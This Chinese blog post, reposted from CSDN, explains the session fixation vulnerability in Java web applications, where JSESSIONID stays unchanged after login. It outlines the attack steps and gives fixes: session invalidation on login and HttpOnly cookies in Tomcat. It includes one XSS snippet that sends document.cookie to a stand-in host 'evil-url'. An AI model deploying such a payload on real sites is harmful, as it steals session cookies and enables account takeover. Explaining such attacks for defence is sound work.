SESSIONID固定漏洞

最新推荐文章于 2024-08-29 19:36:13 发布
最新推荐文章于 2024-08-29 19:36:13 发布
阅读量3.1k 收藏
点赞数
分类专栏: 安全

问题场景

 

访问一个WEB页面,会看到有一个JSESSIONID,这是由服务器端在会话开始是通过set-cookie来设置的匿名SessionId

 

在登录进入后,再次查看SESSIONID,会发现此值未发生改变,这样,就产生了SESSIONID固定漏洞


攻击步骤

第一步,需要获取被攻击用户的JSESSIONID,可以通过给被攻击用户一个伪造的JSESSIONID,使其用该JESSIONID登录,获取用户登录后的JESSIONID。(这里作为示范,直接从浏览器中获取)
第二步,等被攻击用户登录,是JESSIONID成为已登录状态。
第三步,伪造请求,访问登录后的资源。
在用户登录使该JSESSIONID称为已登录的ID后,攻击者就可以利用这个ID伪造请求访问登录后的资源。

一旦站点中存在可利用的XSS漏洞,攻击者可直接利用注入的JS脚本获取Cookie,进而通过异步请求把存有Session ID的Cookie上报给攻击者。

       var img = document.createElement('img');

       img.src = 'http://evil-url?c=' +encodeURIComponent(document.cookie);

       document.getElementsByTagName('body')[0].appendChild(img);


 


漏洞分析处理

出现该问题的主要原因是登录控制使用的固定的SessionID,登录前与登录后的SessionID是一样的。这样就使得攻击者可以简单的伪造一个SessionID诱使用户使用该SessionID登录,即可获取登录权限。如果配合XSS漏洞,则更加可以轻易获取登录权限。避免这一漏洞的方法主要有两种:
1.在登录后重置sessionID
在登录验证成功后,通过重置session,是之前的匿名sessionId失效,这样可以避免使用伪造的sessionId进行攻击。

request.getSession().invalidate();
request.getSession(true);

2.设置httpOnly属性
httponly是微软对cookie做的扩展,该值指定 Cookie 是否可通过客户端脚本访问, 解决用户的cookie可能被盗用的问题,减少跨站脚本攻击
主流的大多数浏览器已经支持此属性。httpOnly是cookie的扩展属性,并不包含在servlet2.x的规范里,因此一些javaee应用服务器并不支持httpOnly,针对tomcat,>6.0.19或者>5.5.28的版本才支持httpOnly属性,具体方法是在conf/context.xml添加httpOnly属性设置

 

    <Context useHttpOnly="true">
    ...
    </Context>


另一种设置httpOnly的方式是使用Tomcat的servlet扩展直接写header

response.setHeader( "Set-Cookie", "name=value; HttpOnly");

防止js获取sessionid
 

原文:https://blog.csdn.net/pxg943055021/article/details/55188857

master_bro
关注
专栏目录
漏洞挖掘】——134、 逻辑漏洞之Session会话安全
Fly_鹏程万里
07-26 526
Session是应用系统对浏览器客户端身份认证的属性标识,在用户退出应用系统时应将客户端Session认证属性标识清空,如果未能清空客户端Session标识,在下次登录系统时系统会重复利用该Session标识进行认证会话,攻击者可利用该漏洞生成固定Session会话并诱骗用户利用攻击者生成的固定会话进行系统登录,从而导致用户会话认证被窃取。
修复shiro固定会话攻击漏洞 sessionId
康康的博客
11-05 697
@PostMapping("/login") @ResponseBody public AjaxResult ajaxLogin(String username, String password, Boolean rememberMe) { System.out.println("username = " + username); UsernamePasswordToken token = new UsernamePasswordToken(user.
WEB项目SESSIONID固定漏洞
一瓶绿茶三元钱
02-15 6569
问题场景 访问一个WEB页面,会看到有一个JSESSIONID,这是由服务器端在会话开始是通过set-cookie来设置的匿名SessionId 在登录进入后,再次查看SESSIONID,会发现此值未发生改变,这样,就产生了SESSIONID固定漏洞 攻击步骤 第一步,需要获取被攻击用户的JSESSIONID,可以通过给被攻击用户一个伪造的JSESS
Python接口自动化测试-Session会话保持(实战详细)
最新发布
百晓生说测试的博客
08-29 1132
在接口测试的过程中,经常会遇到有些接口需要在登录的状态下才能请求,否则会提示请登录,那么怎样解决呢?可以通过session进行会话保持。session(会话)session,即会话。那么什么又是会话?我们来看一下会话的生存周期就能大致明白,如下:客户端(通常是浏览器)–>发送第一个请求–>某应用服务器,彼此成功建立连接,即创建会话;会话中:客户端接着请求该应用服务器的其他资源;结束:关闭客户端(通常是浏览器)或者会话超时,会话结束。会话保持。
jsessionid存在的问题及其解决方案
03-16
NULL 博文链接:https://mysun.iteye.com/blog/413836
固定SessionID漏洞
阿里巴巴B2B诚信开发部
12-13 1381
  by BoBo   一个简单的登录控制 下面是一个最常用最简单的登录控制流程,通过表单提交用户名密码,servlet判断用户名密码,正确则写一个session,然后跳转到登录后的能够看到的页面登录页面JSP /*省略头部信息*/ &lt;body&gt; &lt;form action="SessionTestServlet" method="post"&gt; 用户...
Allaire JRun “JSessionID信息泄露漏洞
ncnynl的专栏
09-01 1401
Allaire JRun “JSessionID信息泄露漏洞 发布日期: 2001-12-6受影响的系统:  Allaire JRun 3.0   - IBM AIX 4.2   - IBM AIX 4.3   - Microsoft Windows 95   - Microsoft Windows 98   - Microsoft Windows 2000   -
漏洞:会话固定攻击(session fixation attack)
yggcwhat
01-31 2323
什么是会话固定攻击? 会话固定攻击(sessionfixation attack)是利用应用系统在服务器的会话ID固定不变机制,借助他人用相同的会话ID获取认证和授权,然后利用该会话ID劫持他人的会话以成功冒充他人,造成会话固定攻击。 整个攻击流程是: 1、攻击者Attacker能正常访问该应用网站; 2、应用网站服务器返回一个会话ID给他; 3、攻击者Attacker用该会话ID构造一个该网站链接发给受害者Victim; 4-5、受害者Victim点击该链接,携带攻击者的会话ID和用户名密码.
小记:web安全测试之——固定session漏洞
weixin_30565199的博客
05-11 517
今天因为项目背景需要,需要检测web接口是否一些安全隐患。 无奈于从未掌握有系统的渗透性知识,只好根据个人对网络协议和 web 的理解,做一些探索,最终发现了一个session fixation attacks漏洞。 场景回顾: 使用抓包工具监听业务的登录登出接口,发现登录后的 JSESSIONID 为 A,登出后的 JSESSIONID 仍然为A; 比如 header 里面部分是这样的 Cook...
PHP Session_Regenerate_ID函数双释放内存破坏漏洞
10-28
在PHP中,`session_regenerate_id()`函数是用于生成一个新的会话ID并替换当前的会话ID,以增加安全性,防止会话固定攻击。然而,在某些特定版本的PHP中,这个函数存在一个严重的问题——双释放内存破坏漏洞。 该...
会话固定漏洞小结——概念、原理、检测及防御
7Riven's blog
12-29 6642
会话固定 概念 会话固定(Session fixation)是一种诱骗受害者使用攻击者指定的会话标识(SessionID)的攻击手段。这是攻击者获取合法会话标识的最简单的方法。会话固定也可以看成是会话劫持的一种类型,原因是会话固定的攻击的主要目的同样是获得目标用户的合法会话,不过会话固定还可以是强迫受害者使用攻击者设定的一个有效会话,以此来获得用户的敏感信息。 原理 访问网站时,网站会...
安全测试初探(二)session测试篇
Linfosheng1的博客
04-01 1757
1.1.Session会话固定测试 1.1.1测试原理和方法 Session是应用系统对浏览器客户端身份认证的属性标识,在用户退出系统时应将客户端session认证属性标识清空。如果未能及时清空客户端session标识,下次登录时系统会重复利用该session标识进行认证会话。攻击者可以利用该漏洞生成固定的session会话,诱骗用户利用攻击者生成的固定会话进行系统登录,从而导致用户会话认证被窃取...
会话固定漏洞
weixin_50464560的博客
07-03 306
整个利用链构造下来是比较有趣的,首发于某个安全圈子,主要是想分享一下思路,发过来先知是为了看看有没有什么建议,讨论。 此次审的是yxcms 1.4.6版本,应该是最后一个版本了吧? 0x01 从任意文件删除漏洞说起 yxcms经过修修补补,前台的一些洞都挖得差不多了,一番挖掘没什么效果,转到后台去。后台的防护是比较松懈的。 找到了个任意文件删除漏洞。 /protected/apps/admin/controller/filesController.php public function del()
5、会话固定漏洞
feiwujiushiwo的博客
02-05 779
会话固定漏洞是指用户在首次登录之后,应用程序未正确的更新或删除Session ID(会话标识符),导致后续的登录请求仍然使用初始的会话ID。这时攻击者就有可能通过捕获并使用这些持久会话ID来模拟已登录的用户,执行恶意操作。Web通用漏洞
会话固定与劫持漏洞
西电卢本伟的博客
04-08 3383
会话;session、cookie、token;会话固定与劫持
Java SessionID漏洞分析处理
岁月沉淀,积累财富
11-13 1876
一般我们在实际项目当中经常出现黑客,在js方式获取我们在浏览器当中存储的cookie资料,绕开登录并登录主机进行资料的访问;一帮有以下两种方式,防止此类事情发生: 1.在登录后重置sessionID 在登录验证成功后,通过重置session,是之前的匿名sessionId失效,这样可以避免使用伪造的sessionId进行攻击。代码如下 protected void doPos
jsessionid攻击模式
y6s6y6y的博客
07-10 778
request中获取别人jsessionid【通过钓鱼网站等方式进行获取,然后就获取到了其他人在改系统中的权限】,然后禁用浏览器中的cookie就能获取其登录信息【在浏从览器的Internet选项中,找到隐私,找到高级,然后选中阻止coolie即可】...
Web安全-会话ID漏洞
道阻且长,行则将至。
07-07 3815
概述 以下摘自《白帽子讲 web 安全》 密码与证书等认证手段,一般仅仅用于登录(Login)的过程。当登陆完成后,用户访问网站的页面,不可能每次浏览器请求页面时,都再使用密码认证一次。因此,当认证完成后,就需要替换一个对用户透明的凭证。这个凭证就是SessionID。 当用户登陆完成后,在服务器端就会创建一个新的会话(Session),会话中会保存用户的状态和相关信息。服务器端维护所有在线用户的...
jsessionid和jwt_jsessionid
weixin_42123456的博客
01-13 789
ntellij idea插件2020-12-25 17:03:27第一次从Eclipse转到idea时,那时候确实挺难受的,各种不是习惯,各种抵触,后来设置一些eclipse的使用习惯,发现越来越好用了,作为一名开发,工欲善其事必先利其器,hahha------ 取代POSTMAN的利器1、Tools -> HTTP Client -> Test RESTFUL Web Service...
PHP程序安全:防止漏洞攻击策略分析
为了保护会话,应禁用URL中的Session ID传输,使用HTTPS加密通信,并定期刷新Session ID以减少会话固定攻击的风险。 5. **环境变量和全局变量的误用**: PHP的全局变量如`$_GET`, `$_POST`, `$_COOKIE`等,如果...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值